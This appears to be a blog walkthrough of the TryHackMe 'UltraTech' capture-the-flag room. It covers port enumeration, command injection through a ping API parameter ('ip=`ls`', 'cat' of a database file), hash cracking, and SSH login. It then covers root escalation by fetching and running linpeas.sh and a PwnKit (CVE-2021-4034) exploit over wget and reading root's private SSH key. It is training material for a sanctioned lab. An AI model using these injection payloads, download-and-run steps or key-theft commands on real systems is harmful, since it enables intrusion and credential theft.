TryHackMe: UltraTech

!#Tasks

##Task 1:

!>Deploy the machine

<>: Deploy the machine

> No answer needed

##Task 2 :

!>It’s enumeration time!

<>: Which software is using the port 8081?

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.102.70

Ans: N******

<>: Which other non-standard port is used?

Command: sudo nmap -sT -p- -sV -T5 -oN nmap/all_ports 10.10.102.70

Ans: 3****

<>: Which software using this port?

Ans: A*****

<>: Which GNU/Linux distribution seems to be used?

Ans: U*****

<>: The software using the port 8080 is a REST api, how many of its routes are used by the web application?

Command: gobuster dir -u http://10.10.102.70:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Ans: *

>: Let’s check the sites

>: Scan the port we just found

Command: gobuster dir -u http://10.10.102.70:31331/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

>: Let’s look at the path from / js

>: Look at api.js

>: Let’s look at and check how the api we found works

>: After checking and pinging, everything looks great

##Task 3:

!>Let the fun begin

! There is a database lying around, what is its filename?

Url : http://10.10.102.70:8081/ping?ip=`ls`

! What is the first user’s password hash?

http://10.10.102.70:8081/ping?ip=`cat%20u****.**.******`

Yalniz birinin sifresi qirilir

! What is the password associated with this hash?

Url: https://www.md5online.org/md5-decrypt.html

>: Let’s check the entry with ssh

Command: ssh r00t@10.10.102.70

##Task 4

!>The root of all evil

!What are the first 9 characters of the root user’s private SSH key?

>: Let’s look at the vulnerabilities to gain authority

>: We can do it manually. But I will use Linpeas.sh, an automated tool

>: You can download the tool here:

https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

>: Let’s start the transfer

>: From our terminal
Command: python3 -m http.server 80

>: From target terminal
Command: wget http://10.8.223.65/linpeas.sh

>: Give permission and get started
Command: chmod +x linpeas.sh
Command: ./linpeas.sh

We found some vulnerability

>: I decided to use CVE-2021–4034

>: You can download the exploit here

>: Let’s start the transfer

>: From our terminal

Command: python3 -m http.server 80

>: From target terminal

Command: wget http://10.8.223.65/pwnkit.c

>:Prepare and started

Command: gcc pwnkit.c -o exploit

Command: ./exploit

And now we are the root

Now let’s go and do the last task
Command : cat /root/.ssh/id_rsa

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Cross-Process Rendering using CALayer

Array & String

Thinkium Airdrop alert

Encapsulat — whu? — tion?

Most Frequently Asked Java Interview Questions.

Passing the Dynamic Parameters from Azure Data Factory to Logic Apps

The notes for Fundamentals of Software Architecture (4)

Boot Out Coding Bootcamps

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

HackTheBox Timing Write-Up

Timing

Beginner picoMini CTF 2022 — Writeup

Simple CTF | TryHackMe